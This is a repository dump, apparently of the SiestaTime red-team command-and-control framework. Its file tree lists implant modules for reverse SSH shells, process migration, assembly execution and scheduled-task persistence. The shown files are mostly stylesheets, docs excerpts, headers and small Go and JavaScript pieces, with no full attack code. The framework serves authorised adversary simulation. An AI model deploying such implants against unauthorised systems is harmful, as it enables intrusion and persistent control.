├── installConfig ├── reports │ └── .keep ├── vpskeys │ └── .keep ├── downloads │ └── .keep ├── configAWS.txt ├── hive.service ├── implant_dependencies.txt ├── instScriptNoDarwin.sh └── instScript.sh ├── docs ├── requirements.txt ├── _static │ ├── STicon.png │ └── images │ │ ├── install │ │ ├── vsc.png │ │ ├── winsearch.png │ │ └── installconfig.png │ │ ├── hivestatus │ │ ├── jobs.png │ │ └── logs.png │ │ ├── interactions │ │ ├── ls.png │ │ ├── empire.png │ │ ├── exec.png │ │ ├── inject.png │ │ ├── handlers.png │ │ ├── accesschk.png │ │ ├── bichitoinfo.png │ │ ├── dropimplant.png │ │ ├── listimplant.png │ │ ├── sshinteract.png │ │ ├── bichitoheader.png │ │ ├── listbichitos.png │ │ ├── bichitoconsole.png │ │ ├── downloadimplant.png │ │ └── implantwithindroplet.png │ │ ├── addresources │ │ ├── gmail.png │ │ ├── godaddy.png │ │ ├── addec2vpc.png │ │ ├── createops.png │ │ └── domainstatus.png │ │ ├── deployment │ │ ├── droplet.png │ │ ├── deploypost.png │ │ ├── redsonline.png │ │ ├── craftimplant.png │ │ ├── msftworking.png │ │ ├── persistence.png │ │ ├── redsoffline.png │ │ ├── networkmodules.png │ │ ├── persistencexdg.png │ │ └── persistencelaunchd.png │ │ └── reporting │ │ └── createreport.png ├── resources │ ├── operators.rst │ ├── vpc.rst │ └── domains.rst ├── Makefile ├── hive │ └── jobslogs.rst ├── make.bat ├── reporting │ └── basicreport.rst ├── install │ ├── client.rst │ ├── dependencies.rst │ └── hive.rst ├── interactions │ ├── implants.rst │ └── postinteractions.rst ├── misc │ ├── bugs.rst │ └── concepts.rst └── deployment │ └── postservers.rst ├── src ├── client │ ├── electronGUI │ │ ├── static │ │ │ ├── icons │ │ │ │ └── png │ │ │ │ │ ├── STicon.png │ │ │ │ │ ├── STicon2.png │ │ │ │ │ └── STiconM.png │ │ │ └── css │ │ │ │ └── font-awesome-4.7.0 │ │ │ │ ├── fonts │ │ │ │ ├── FontAwesome.otf │ │ │ │ ├── fontawesome-webfont.eot │ │ │ │ ├── fontawesome-webfont.ttf │ │ │ │ ├── fontawesome-webfont.woff │ │ │ │ └── fontawesome-webfont.woff2 │ │ │ │ ├── less │ │ │ 
│ ├── fixed-width.less │ │ │ │ ├── screen-reader.less │ │ │ │ ├── larger.less │ │ │ │ ├── list.less │ │ │ │ ├── core.less │ │ │ │ ├── stacked.less │ │ │ │ ├── font-awesome.less │ │ │ │ ├── bordered-pulled.less │ │ │ │ ├── rotated-flipped.less │ │ │ │ ├── path.less │ │ │ │ ├── animated.less │ │ │ │ └── mixins.less │ │ │ │ └── scss │ │ │ │ ├── _fixed-width.scss │ │ │ │ ├── _screen-reader.scss │ │ │ │ ├── _larger.scss │ │ │ │ ├── _list.scss │ │ │ │ ├── _core.scss │ │ │ │ ├── font-awesome.scss │ │ │ │ ├── _stacked.scss │ │ │ │ ├── _bordered-pulled.scss │ │ │ │ ├── _rotated-flipped.scss │ │ │ │ ├── _path.scss │ │ │ │ ├── _animated.scss │ │ │ │ └── _mixins.scss │ │ ├── components │ │ │ ├── jobs │ │ │ │ ├── jobs.css │ │ │ │ ├── jobs.html │ │ │ │ └── jobs.js │ │ │ ├── logs │ │ │ │ ├── logs.css │ │ │ │ ├── logs.js │ │ │ │ └── logs.html │ │ │ ├── console │ │ │ │ ├── console.js │ │ │ │ └── console.html │ │ │ ├── report │ │ │ │ ├── report.js │ │ │ │ └── report.html │ │ │ ├── createforms │ │ │ │ ├── createReport.html │ │ │ │ ├── createOperator.html │ │ │ │ ├── createVPS.html │ │ │ │ ├── createDomain.html │ │ │ │ ├── createStaging.html │ │ │ │ └── createImplant.html │ │ │ ├── header │ │ │ │ ├── header.js │ │ │ │ └── header.html │ │ │ ├── vps │ │ │ │ ├── vps.js │ │ │ │ └── vps.html │ │ │ ├── domain │ │ │ │ ├── domain.js │ │ │ │ └── domain.html │ │ │ ├── staging │ │ │ │ └── staging.html │ │ │ └── bichito │ │ │ │ └── bichito.html │ │ ├── renderer.js │ │ ├── package.json │ │ └── main.js │ ├── client.go │ └── clientMisc.go ├── infra │ └── .terraformrc ├── bichito │ ├── modules │ │ ├── biterpreter │ │ │ ├── execute_assembly_windows │ │ │ │ ├── execute_assembly_windows.h │ │ │ │ ├── execute_assembly_windows_x32.go │ │ │ │ ├── execute_assembly_windows_x64.go │ │ │ │ └── execute_assembly_windows.cpp │ │ │ ├── migrate_remote_thread_windows │ │ │ │ ├── migrate_remote_thread_windows.h │ │ │ │ ├── migrate_remote_thread_windows_x32.go │ │ │ │ ├── migrate_remote_thread_windows_x64.go │ │ │ │ 
└── migrate_remote_thread_windows.cpp │ │ │ ├── sysinfo_native_windows │ │ │ │ └── sysinfo_native_windows.h │ │ │ ├── biterpreter_misc.go │ │ │ ├── sysinfo_native_windows.go │ │ │ ├── downloadf_trio.go │ │ │ ├── writef_trio.go │ │ │ ├── sysinfo_native_darwin.go │ │ │ ├── inject_Empire_darwin.go │ │ │ ├── exec_linuxdarwin.go │ │ │ ├── inject_Empire_linux.go │ │ │ ├── uploadf_trio.go │ │ │ ├── inject_Empire_windows.go │ │ │ ├── sysinfo_native_darwin │ │ │ │ ├── sysinfo_native_darwin.m │ │ │ │ └── sysinfo_native_darwin.go │ │ │ ├── readf_trio.go │ │ │ ├── migrate_linuxdarwin.go │ │ │ ├── accesschk_linuxdarwin.go │ │ │ ├── exec_windows.go │ │ │ ├── migrate_remote_thread_windows.go │ │ │ ├── ls_trio.go │ │ │ ├── accesschk_windows.go │ │ │ ├── wipef_trio.go │ │ │ ├── inject_rev_sshShell_windows.go │ │ │ ├── inject_rev_sshShell_linuxdarwin.go │ │ │ ├── sysinfo_no_native_darwin.go │ │ │ ├── sysinfo_no_native_linux.go │ │ │ ├── sysinfo_no_native_windows.go │ │ │ ├── inject_rev_sshSOCKS5_trio.go │ │ │ └── sysinfo_native_linux.go │ │ ├── persistence │ │ │ ├── windows_schtasks │ │ │ │ ├── windows_schtasks.h │ │ │ │ ├── windows_schtasks.go │ │ │ │ └── windows_schtasks_x64.go │ │ │ ├── no_persistence.go │ │ │ └── windows_schtasks.go │ │ └── network │ │ │ └── https_selfsigned_GO.go │ └── biMisc.go ├── redirector │ ├── redirector.service │ ├── redMisc.go │ ├── redBiComs.go │ └── redirector.go ├── hive │ ├── hive.go │ └── hivMisc.go └── tools │ └── tools.go ├── .gitignore ├── .readthedocs.yml └── stime.sh /installConfig/reports/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /installConfig/vpskeys/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /installConfig/downloads/.keep: 
-------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /docs/requirements.txt: -------------------------------------------------------------------------------- 1 | sphinx 2 | sphinx_rtd_theme 3 | sphinx-prompt -------------------------------------------------------------------------------- /docs/_static/STicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/STicon.png -------------------------------------------------------------------------------- /docs/_static/images/install/vsc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/install/vsc.png -------------------------------------------------------------------------------- /docs/_static/images/hivestatus/jobs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/hivestatus/jobs.png -------------------------------------------------------------------------------- /docs/_static/images/hivestatus/logs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/hivestatus/logs.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/ls.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/ls.png -------------------------------------------------------------------------------- /docs/_static/images/addresources/gmail.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/addresources/gmail.png -------------------------------------------------------------------------------- /docs/_static/images/deployment/droplet.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/deployment/droplet.png -------------------------------------------------------------------------------- /docs/_static/images/install/winsearch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/install/winsearch.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/empire.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/empire.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/exec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/exec.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/inject.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/inject.png -------------------------------------------------------------------------------- /docs/_static/images/addresources/godaddy.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/addresources/godaddy.png -------------------------------------------------------------------------------- /docs/_static/images/deployment/deploypost.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/deployment/deploypost.png -------------------------------------------------------------------------------- /docs/_static/images/deployment/redsonline.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/deployment/redsonline.png -------------------------------------------------------------------------------- /docs/_static/images/install/installconfig.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/install/installconfig.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/handlers.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/handlers.png -------------------------------------------------------------------------------- /docs/_static/images/addresources/addec2vpc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/addresources/addec2vpc.png -------------------------------------------------------------------------------- /docs/_static/images/addresources/createops.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/addresources/createops.png -------------------------------------------------------------------------------- /docs/_static/images/deployment/craftimplant.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/deployment/craftimplant.png -------------------------------------------------------------------------------- /docs/_static/images/deployment/msftworking.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/deployment/msftworking.png -------------------------------------------------------------------------------- /docs/_static/images/deployment/persistence.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/deployment/persistence.png -------------------------------------------------------------------------------- /docs/_static/images/deployment/redsoffline.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/deployment/redsoffline.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/accesschk.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/accesschk.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/bichitoinfo.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/bichitoinfo.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/dropimplant.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/dropimplant.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/listimplant.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/listimplant.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/sshinteract.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/sshinteract.png -------------------------------------------------------------------------------- /docs/_static/images/reporting/createreport.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/reporting/createreport.png -------------------------------------------------------------------------------- /docs/_static/images/addresources/domainstatus.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/addresources/domainstatus.png -------------------------------------------------------------------------------- /docs/_static/images/deployment/networkmodules.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/deployment/networkmodules.png -------------------------------------------------------------------------------- /docs/_static/images/deployment/persistencexdg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/deployment/persistencexdg.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/bichitoheader.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/bichitoheader.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/listbichitos.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/listbichitos.png -------------------------------------------------------------------------------- /src/client/electronGUI/static/icons/png/STicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/src/client/electronGUI/static/icons/png/STicon.png -------------------------------------------------------------------------------- /docs/_static/images/deployment/persistencelaunchd.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/deployment/persistencelaunchd.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/bichitoconsole.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/bichitoconsole.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/downloadimplant.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/downloadimplant.png -------------------------------------------------------------------------------- /src/client/electronGUI/static/icons/png/STicon2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/src/client/electronGUI/static/icons/png/STicon2.png -------------------------------------------------------------------------------- /src/client/electronGUI/static/icons/png/STiconM.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/src/client/electronGUI/static/icons/png/STiconM.png -------------------------------------------------------------------------------- /docs/_static/images/interactions/implantwithindroplet.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/docs/_static/images/interactions/implantwithindroplet.png -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | installConfig/configAWS.txt 2 | installConfig/MacOSX10.13.sdk.tar.xz 3 | installConfig/windependencies.zip 4 | installConfig/west1.pem 5 | installConfig/configAWS.txt -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/fonts/FontAwesome.otf: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/src/client/electronGUI/static/css/font-awesome-4.7.0/fonts/FontAwesome.otf -------------------------------------------------------------------------------- /src/client/electronGUI/components/jobs/jobs.css: -------------------------------------------------------------------------------- 1 | 2 | .my-custom-scrollbar { 3 | position: relative; 4 | height: 790px; 5 | overflow: auto; 6 | } 7 | 8 | .table-wrapper-scroll-y { 9 | display: block; 10 | } -------------------------------------------------------------------------------- /src/client/electronGUI/components/logs/logs.css: -------------------------------------------------------------------------------- 1 | 2 | .my-custom-scrollbar { 3 | position: relative; 4 | height: 790px; 5 | overflow: auto; 6 | } 7 | 8 | .table-wrapper-scroll-y { 9 | display: block; 10 | } -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/less/fixed-width.less: -------------------------------------------------------------------------------- 1 | // Fixed Width Icons 2 | // ------------------------- 3 | .@{fa-css-prefix}-fw { 4 | width: (18em / 14); 5 | text-align: center; 6 | } 7 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/less/screen-reader.less: -------------------------------------------------------------------------------- 1 | // Screen Readers 2 | // ------------------------- 3 | 4 | .sr-only { .sr-only(); } 5 | .sr-only-focusable { .sr-only-focusable(); } 6 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/fonts/fontawesome-webfont.eot: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/src/client/electronGUI/static/css/font-awesome-4.7.0/fonts/fontawesome-webfont.eot -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/fonts/fontawesome-webfont.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/src/client/electronGUI/static/css/font-awesome-4.7.0/fonts/fontawesome-webfont.ttf -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/fonts/fontawesome-webfont.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/src/client/electronGUI/static/css/font-awesome-4.7.0/fonts/fontawesome-webfont.woff -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/scss/_fixed-width.scss: -------------------------------------------------------------------------------- 1 | // Fixed Width Icons 2 | // ------------------------- 3 | .#{$fa-css-prefix}-fw { 4 | width: (18em / 14); 5 | text-align: center; 6 | } 7 | -------------------------------------------------------------------------------- /src/client/electronGUI/renderer.js: -------------------------------------------------------------------------------- 1 | // This file is required by the index.html file and will 2 | // be executed in the renderer process for that window. 3 | // All of the Node.js APIs are available in this process. 
4 | 5 | 6 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/fonts/fontawesome-webfont.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rebujacker/SiestaTime/HEAD/src/client/electronGUI/static/css/font-awesome-4.7.0/fonts/fontawesome-webfont.woff2 -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/scss/_screen-reader.scss: -------------------------------------------------------------------------------- 1 | // Screen Readers 2 | // ------------------------- 3 | 4 | .sr-only { @include sr-only(); } 5 | .sr-only-focusable { @include sr-only-focusable(); } 6 | -------------------------------------------------------------------------------- /src/infra/.terraformrc: -------------------------------------------------------------------------------- 1 | provider_installation { 2 | filesystem_mirror { 3 | path = "/root/.terraform.d/plugins/" 4 | include = ["hashicorp/godaddy"] 5 | } 6 | direct { 7 | exclude = ["hashicorp/godaddy"] 8 | } 9 | } -------------------------------------------------------------------------------- /installConfig/configAWS.txt: -------------------------------------------------------------------------------- 1 | USERNAME: 2 | PASSWORD: 3 | port: 4 | accesskey: 5 | secretkey: 6 | region: 7 | keyname: 8 | ami: 9 | itype: 10 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/execute_assembly_windows/execute_assembly_windows.h: -------------------------------------------------------------------------------- 1 | #ifndef windows_executeassembly_windows_H_ 2 | #define windows_executeassembly_windows_H_ 3 | 4 | #ifdef __cplusplus 5 | extern "C" { 6 | #endif 7 | 8 | int ExecuteAssembly(char*,int,char*); 9 | 10 | #ifdef __cplusplus 11 | } 12 | #endif 13 | 14 | 
#endif -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/migrate_remote_thread_windows/migrate_remote_thread_windows.h: -------------------------------------------------------------------------------- 1 | #ifndef migrate_remote_thread_windows_H_ 2 | #define migrate_remote_thread_windows_H_ 3 | 4 | #ifdef __cplusplus 5 | extern "C" { 6 | #endif 7 | 8 | int Migrate(char*,int,int,char*); 9 | 10 | #ifdef __cplusplus 11 | } 12 | #endif 13 | 14 | #endif -------------------------------------------------------------------------------- /src/bichito/modules/persistence/windows_schtasks/windows_schtasks.h: -------------------------------------------------------------------------------- 1 | #ifndef windows_schtasks_H_ 2 | #define windows_schtasks_H_ 3 | 4 | #ifdef __cplusplus 5 | extern "C" { 6 | #endif 7 | 8 | int SchtasksOnUserLogon(char*,char*,char*); 9 | int SchtasksDelete(char*, char*); 10 | 11 | #ifdef __cplusplus 12 | } 13 | #endif 14 | 15 | #endif 16 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/sysinfo_native_windows/sysinfo_native_windows.h: -------------------------------------------------------------------------------- 1 | #ifndef sysinfo_native_windows_H_ 2 | #define sysinfo_native_windows_H_ 3 | 4 | #ifdef __cplusplus 5 | extern "C" { 6 | #endif 7 | 8 | int ProcessIntegrity(char*, char*); 9 | int IsLocalAdmin(char*, char*); 10 | 11 | #ifdef __cplusplus 12 | } 13 | #endif 14 | 15 | #endif 16 | 17 | -------------------------------------------------------------------------------- /installConfig/hive.service: -------------------------------------------------------------------------------- 1 | [Unit] 2 | Description=STime Hive 3 | After=syslog.target network.target remote-fs.target nss-lookup.target 4 | 5 | [Service] 6 | Type=simple 7 | WorkingDirectory=/usr/local/STHive/ 8 | ExecStart=/usr/local/STHive/hive 9 | Restart=on-failure 10 | 
// loadPrivateKey builds an ssh.AuthMethod from PEM-encoded private key
// material held in memory (keyString is the key itself, not a path to it).
//
// The parse error from ssh.ParsePrivateKey is handed back unchanged. Note
// that ParsePrivateKey does not accept passphrase-protected keys, so an
// encrypted key surfaces here as an error rather than as a prompt.
func loadPrivateKey(keyString string) (ssh.AuthMethod, error) {
	keyBytes := []byte(keyString)
	signer, err := ssh.ParsePrivateKey(keyBytes)
	if err == nil {
		return ssh.PublicKeys(signer), nil
	}
	return nil, err
}
-------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/less/larger.less: -------------------------------------------------------------------------------- 1 | // Icon Sizes 2 | // ------------------------- 3 | 4 | /* makes the font 33% larger relative to the icon container */ 5 | .@{fa-css-prefix}-lg { 6 | font-size: (4em / 3); 7 | line-height: (3em / 4); 8 | vertical-align: -15%; 9 | } 10 | .@{fa-css-prefix}-2x { font-size: 2em; } 11 | .@{fa-css-prefix}-3x { font-size: 3em; } 12 | .@{fa-css-prefix}-4x { font-size: 4em; } 13 | .@{fa-css-prefix}-5x { font-size: 5em; } 14 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/scss/_larger.scss: -------------------------------------------------------------------------------- 1 | // Icon Sizes 2 | // ------------------------- 3 | 4 | /* makes the font 33% larger relative to the icon container */ 5 | .#{$fa-css-prefix}-lg { 6 | font-size: (4em / 3); 7 | line-height: (3em / 4); 8 | vertical-align: -15%; 9 | } 10 | .#{$fa-css-prefix}-2x { font-size: 2em; } 11 | .#{$fa-css-prefix}-3x { font-size: 3em; } 12 | .#{$fa-css-prefix}-4x { font-size: 4em; } 13 | .#{$fa-css-prefix}-5x { font-size: 5em; } 14 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/less/list.less: -------------------------------------------------------------------------------- 1 | // List Icons 2 | // ------------------------- 3 | 4 | .@{fa-css-prefix}-ul { 5 | padding-left: 0; 6 | margin-left: @fa-li-width; 7 | list-style-type: none; 8 | > li { position: relative; } 9 | } 10 | .@{fa-css-prefix}-li { 11 | position: absolute; 12 | left: -@fa-li-width; 13 | width: @fa-li-width; 14 | top: (2em / 14); 15 | text-align: center; 16 | &.@{fa-css-prefix}-lg { 17 | left: (-@fa-li-width + (4em / 14)); 18 | } 19 | } 20 | 
-------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/scss/_list.scss: -------------------------------------------------------------------------------- 1 | // List Icons 2 | // ------------------------- 3 | 4 | .#{$fa-css-prefix}-ul { 5 | padding-left: 0; 6 | margin-left: $fa-li-width; 7 | list-style-type: none; 8 | > li { position: relative; } 9 | } 10 | .#{$fa-css-prefix}-li { 11 | position: absolute; 12 | left: -$fa-li-width; 13 | width: $fa-li-width; 14 | top: (2em / 14); 15 | text-align: center; 16 | &.#{$fa-css-prefix}-lg { 17 | left: -$fa-li-width + (4em / 14); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/less/core.less: -------------------------------------------------------------------------------- 1 | // Base Class Definition 2 | // ------------------------- 3 | 4 | .@{fa-css-prefix} { 5 | display: inline-block; 6 | font: normal normal normal @fa-font-size-base/@fa-line-height-base FontAwesome; // shortening font declaration 7 | font-size: inherit; // can't have font-size inherit on line above, so need to override 8 | text-rendering: auto; // optimizelegibility throws things off #1094 9 | -webkit-font-smoothing: antialiased; 10 | -moz-osx-font-smoothing: grayscale; 11 | 12 | } 13 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/scss/_core.scss: -------------------------------------------------------------------------------- 1 | // Base Class Definition 2 | // ------------------------- 3 | 4 | .#{$fa-css-prefix} { 5 | display: inline-block; 6 | font: normal normal normal #{$fa-font-size-base}/#{$fa-line-height-base} FontAwesome; // shortening font declaration 7 | font-size: inherit; // can't have font-size inherit on line above, so need to override 8 | text-rendering: auto; // 
optimizelegibility throws things off #1094 9 | -webkit-font-smoothing: antialiased; 10 | -moz-osx-font-smoothing: grayscale; 11 | 12 | } 13 | -------------------------------------------------------------------------------- /docs/resources/operators.rst: -------------------------------------------------------------------------------- 1 | Operators 2 | =========================== 3 | 4 | 5 | Admin User (the one created alongside Hive) will be able to add new operators to the Hive DB. **This lets the other operators on your team log in and perform any action except adding operators.** 6 | 7 | 8 | Adding Operators 9 | -------------------------------------------- 10 | 11 | ``Operators --> Add Operator`` 12 | 13 | .. figure:: ../_static/images/addresources/createops.png 14 | :align: center 15 | :figwidth: 600px 16 | :target: ../_static/images/addresources/createops.png 17 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/scss/font-awesome.scss: -------------------------------------------------------------------------------- 1 | /*!
/*
Description: Hive Main Function
Flow:
	A.Initialize on disk DB and "on-memory" data structures
	B.Initialize the main https handler for Hive (so Operators and redirectors can connect)
*/
// main only chains the two package-level start routines. Both are defined
// elsewhere in package main and neither reports an error back here, so each
// is presumably expected to terminate the process itself on a fatal failure
// — TODO confirm in startDB/startRoaster.
func main() {

	//Start the DB connection and feed on memory arrays
	startDB()

	// Start the listener that Operators and redirectors connect to. The
	// description above calls it the main https handler; the old comment
	// said "http client", but the server side is presumably what is meant.
	startRoaster()
}
/*
Description: Sysinfo --> Windows. Retrieve Operating System key information from the foothold.
Flow:
	A.Delegate to the C++ source wrapped by the sysinfo_native_windows package (sysinfo_native_windows.cpp)
Note: the original note about extracting libraries from a darwin dev. kit reads as copied from the
darwin variant; only the mingw32 part applies to this build — confirm before relying on it.
*/
// Sysinfo forwards the native wrapper's (bool, string) pair untouched. By
// the convention used elsewhere in this package the bool is presumably true
// on failure; what the string holds on success is decided by the native code.
func Sysinfo() (bool, string) {
	// The original bound the pair to a local named "error", shadowing the
	// builtin interface type; the values are simply returned directly.
	return sysinfo_native_windows.SysinfoNativeWindows()
}
8 | }, 9 | "repository": "https://github.com/rebujacker/SiestaTime", 10 | "keywords": [ 11 | "redteam", 12 | "infraestructure", 13 | "implants" 14 | ], 15 | "author": "Rebujacker", 16 | "license": "GPLv3", 17 | "devDependencies": { 18 | "electron": "^11.1.1" 19 | }, 20 | "dependencies": { 21 | "xterm": "^3.14.4", 22 | "htmlencode": "^0.0.4" 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/scss/_stacked.scss: -------------------------------------------------------------------------------- 1 | // Stacked Icons 2 | // ------------------------- 3 | 4 | .#{$fa-css-prefix}-stack { 5 | position: relative; 6 | display: inline-block; 7 | width: 2em; 8 | height: 2em; 9 | line-height: 2em; 10 | vertical-align: middle; 11 | } 12 | .#{$fa-css-prefix}-stack-1x, .#{$fa-css-prefix}-stack-2x { 13 | position: absolute; 14 | left: 0; 15 | width: 100%; 16 | text-align: center; 17 | } 18 | .#{$fa-css-prefix}-stack-1x { line-height: inherit; } 19 | .#{$fa-css-prefix}-stack-2x { font-size: 2em; } 20 | .#{$fa-css-prefix}-inverse { color: $fa-inverse; } 21 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/less/font-awesome.less: -------------------------------------------------------------------------------- 1 | /*! 
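// Load xterm.js and the local-echo helper, then start the terminal once both
// scripts AND the DOM are ready. $.getScript is asynchronous, so the original
// code could run the ready handler before Terminal / LocalEchoController
// existed and fail with a ReferenceError.
const scriptsLoaded = $.when(
  $.getScript("./node_modules/xterm/dist/xterm.js"),
  $.getScript("./static/lib/scripts/local-echo.js")
);

$(document).ready(function () {
  scriptsLoaded
    .done(function () {
      // Start an xterm.js instance
      const term = new Terminal();
      term.open(document.getElementById('terminal'));

      // Create a local echo controller
      const localEcho = new LocalEchoController(term);

      // Read a single line from the user (placeholder handling kept as-is)
      localEcho.read("[bichito]> ")
        .then(input => alert(`User entered: ${input}`))
        .catch(error => alert(`Error reading: ${error}`));
    })
    .fail(function (_jqxhr, _status, error) {
      // A script that failed to load used to go unnoticed.
      alert(`Error loading terminal scripts: ${error}`);
    });
});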
